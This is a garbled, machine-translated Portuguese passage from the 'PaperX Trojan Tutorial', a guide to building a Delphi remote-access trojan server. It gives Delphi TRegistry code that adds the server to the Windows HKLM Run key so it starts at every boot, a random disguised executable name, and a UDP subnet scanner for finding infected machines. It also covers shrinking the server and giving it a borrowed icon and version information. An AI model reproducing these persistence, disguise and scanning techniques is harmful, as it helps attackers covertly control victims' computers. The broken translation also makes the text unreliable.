procedi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números fortuitos geradores com Acaso (), mas só cham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vez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o, nosso NameBuf2 é nomeado com um o valor em um da ord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índices em NameBuf1 escolhidos fortuitamente com o Acaso (), mas só cham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vez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o, nosso NameBuf2 é nomeado com um o valor em um da ord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índices em NameBuf1 escolhidos fortuitamente com o Acaso () (veja a aju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Acaso) função. Então eu nomeio NameBuf2 com mordidas fortuitas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índices de ordem diferentes. Se se mostra que o nome aqui não é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áter em comprimento então um pouco mais cartas são somad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o a extensão de .EXE é somada e um cheque para ver se o nome de arquiv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existe é terminado. Se não existir, o nome de servidor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tado desta função. Se já existe que é alt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avelmente, o nome de Servidor será há pouco Sfctriyc.exe. No ev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que existe isto será escrito em cima de. O odds disso realmente s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o assim não preocupa sobre isto. Se você ainda estiver preocupado, estend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fique com um pouco mais se cheques de FileExis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TER SEU COMEÇO DE SERVIDOR CADA TEMPO OS COMEÇOS DE SISTEMAS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á alguns métodos em qual ter um começo de aplicação ca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o o sistema é reiniciado porém o melhor, e a maioria o profission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todo é pôr uma chave no registro de siste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não estiver familiarizado com seu registro de sistema, vá Começar, Corrido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tipo ' regedit'. Isto exporá o Editor de Registro de siste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contém informação sobre programas e Windows. Sig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nho fazendo tique-taque em cada pasta de papéis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KEY_LOCAL_MACHIN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ftwar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crosof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dow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Vers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então seleciona a pasta de papéis de Corrida - você verá todos os programas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a quando suas botas de sistema. Vá Editar, Novo, Valor de Fio e digi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ns nomeiam. Agora trinco certo no nome e seleciona modifique. Digit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nho de um programa, POR EXEMPLO: c:\command.com - e clica o OK. Se você fos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nicie seu computador nesta fase, command.com seria corrido quand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 começa. O truque é criar um valor de fio aqui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atically de aplicação de servidor, assim deixa começo que faz que (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a apagar agora a propósito aquele fio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a atrás a seu evento de OnCreate. Só debaixo da linha onde você t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ado seu Servidor ao diretório de janelas, ponha este código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o := TRegistry.Creat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Y.ROOTKEY := HKEY_LOCAL_MACHINE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y.OpenKey (' Software\Microsoft\Windows\CurrentVersion\Run ',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rdadeiro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y.WriteString (' MyServerStringName', WindowsDir +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rverName)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y.CloseKey;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y.Free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deveria pôr isto logo antes a linha de Application.Terminate. Também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declarar uma variável local: Registro: TRegistry; -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' Registry' para sua lista de us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4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 compilar agora e pode testar que - e confere o Registro de Window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e olha para a chave de Corrida para ver o que nós fizemos lá. No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você quer mudar MyServerStringName a algo obvi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satisfató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vai em aqui: Nós estamos utilizando o VCL TRegistry Objeto de Delph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uas propriedades e métodos para somar nosso valor de fio pa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o. Primeiramente nós criamos o TRegistry Object para uso. Então nós fix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ootKey, e então abre a chave de Corrida que nós queremos somar um valor de fi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. Nós abrimos nossa chave com o método de OpenKey de TRegistry. O primei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âmetro requer o caminho, e o segundo um valor de Boole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adeiros meios especificando só cria a chave se necessá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o nós escrevemos nosso fio na chave aberta, e então fecha a cha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mente nós livramos nosso TRegistry Object que destrói e liv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ória associa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O CONTINUAR A PROGRAMAR UM ESCÂNER PARA SEU SERVIDOR (UDP)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sta característica nós estaremos usando um protocolo diferente: UDP - o qu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os para Usuário Protocolo de Datagram. É um protocolo de connectionl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ificando nós não precisamos esperar por uma conexão cada tempo, nós há pouco pode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e um pacote e eles passem para a próxima máquina e enviem ou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ós estaremos usando componentes de UDP aqui - o qual o Indy Componente Aparta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ê. Algumas versões de Delphi contêm os componentes de Indy poré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estiver correndo uma versão de Delphi que não faz, você pode carreg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s do local segui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nevrona.com/Indy/downloads/indy8_00_23.ex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a é para Delphi 6 mas trabalha bom com Delphi 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ue a seu diretório de Delphi e instale. Você deveria fechar qualqu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s correntes de Delphi antes de instal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que você instalou os componentes de Indy, Delphi aberto novame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haverá algumas abas de Indy novas em sua Paleta de Componente. Deix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 para programar seu Servidor com estes componentes novo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lado de Servidor você precisaria um IdUDPServer componente escut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pacotes de UDP em um certo porto, e se recebe um pacote -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e de volta uma resposta. Isto vai tudo seja feito no evento de OnUDPRe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ém é uma idéia boa para somar o componente de IdAntiFreeze sua For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sua propriedade de OnlyWhenIdle fixaram Retificar. Isto é um úti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 como impede para sua aplicação de gel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ESCÂNE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 você precisaria a buid uma aplicação de escâner. Você pode usar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UDPClient para enviar os pacotes a um certo subnet de um IP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então incrementa o último dígito de subnet antes da 1 e envia outro paco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quela máquina em uma vol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poderia usar o componente de IdUDPServer novamente, mas há pouco tem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ute para pacotes de UDP no mesmo porto como seu Servidor envi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stas atrás - e acrescenta as respostas a um Memoran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do usar: Christopher Rainbird, Plymouth, Devon, PL8 1DY, REINO UNID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X - Trojan Tutorial em PDF 5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 2003: Ingo Haese que publica (www.hackersbook.co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ORJETAS E TRUQUES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UZINDO O TAMANHO DE SEU SERVIDO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ça sua Forma tão pequeno quanto possível. Uma Forma maior leva mai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s quando compilou. Fixe a propriedade de Altura a 28 e Largura para 1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ém, remova a biblioteca de Diálogos dos usos lista se você não tiv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do qualquer diálo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APACITANDO O MAXIMIZE ÍCONE DE BORDA DE SUA FORM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e o branco ' [+] ' caixa próximo à propriedade de BorderIcons para traz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aixo as colocações. Fixe o biMaximize para Fal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APROVE SUA FORMA A SER CLASSIFICADA SEGUNDO O TAMANHO PELO USUÁRI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 a propriedade de BorderStyle a bsSing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INFORMAÇÃO DE VERSÃO DE ARQUIV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 Projetar, Opções.. e clica a Versão aba de Info. Confira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que diz: " Inclua informação de versão em projeto " - e abasteci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 as caixas e compil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agora trinco certo em seu .EXE e vai para Propriedades e Versã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verá a informação que você há pouco inclui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NDO SEU PRÓPRIO ÍCO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ar um ícone novo a sua aplicação vão Projetar, Opções,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aixo da aba de Aplicação você pode clicar o Ícone de Carga... botão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e para um arquivo de .ICO (arquivo de ícon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ar seu próprio ícone de fato você pode usar o Delphi Imagem Edi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ze seu Borland aba de Delphi por Começo / Programas e abre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de imag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vai Arquivar, Novo, Arquivo de Ícone - você pode projetar seu próprio íco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ndo as ferramentas de pintura. Economize e então carregue seu .ICO economizado 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aplica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tem um arquivo de .EXE com um ícone que você gostaria de usar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óprio projeto, você pode usar software de extração de ícone para extrair o .I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quive do EXE. Nós recomendamos que um programa chamasse Filtro de Ícone para i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é freeware e é muito rápido a extrair o arquivo de ícone. É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ntamente disponível de Download.com - só procura para Filtro de Íc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NCLUSÃO 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pre se lembre completamente para de teste suas aplicações, especialmente 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está planejando lançar softwa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ocê gostasse de promover quaisquer de seus programas em noss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de atestados " de nosso local, por favor e-mail queries@xpaperx.co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uma explicação do que o programa faz, e uma ligação pa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egando. Se você prover um atestado satisfatório de paperX, nós vam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a anfitrião de seu arquivo em nosso servidor de teia. Obriga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UALIZAÇÕES PARA DELPHI 7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7 não vem com o ClientSocket e ServerSock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s instalaram. Aqui é como instalar estes componentes den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7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se você estiver correndo dois exemplos de Delphi, economize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tos e íntimo abaixo assim você é partido com só o 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o de Delphi ab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que Componente (na barra de título), e então " Instala Pacotes..."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 poderia levar alguns segundos para se aparecer uma caixa intitulou " Proje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ções ". Agora clique o Some botão, e folheie seus passeios para se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ório de \Bin. Isto será onde quer que você instalasse Delph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lmente você há pouco teria que subir um nível para achar isto. S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phi instalado como C:\Delphi7, a pasta de papéis de \Bin será localizada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:\Delphi7\B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tro do diretório de \Bin, você está procurando um arquivo chamad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clsockets70.bpl ". Selecione e faça tique-taque Aberto. Agora clique o OK. Se voc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vá para sua aba de Internet da Paleta de Componente, você ver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is componentes novos, o ClientSocket e componentes de ServerSocket.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;Georgia" w:cs="Sylfae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01:00Z</dcterms:created>
  <dc:creator>anonymous</dc:creator>
  <dc:description/>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>anonymous</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2007-12-02T23:17:00Z</dcterms:modified>
  <cp:revision>2</cp:revision>
  <dc:subject/>
  <dc:title>PaperX - Trojan Tutorial em PDF 1  </dc:title>
</cp:coreProperties>
</file>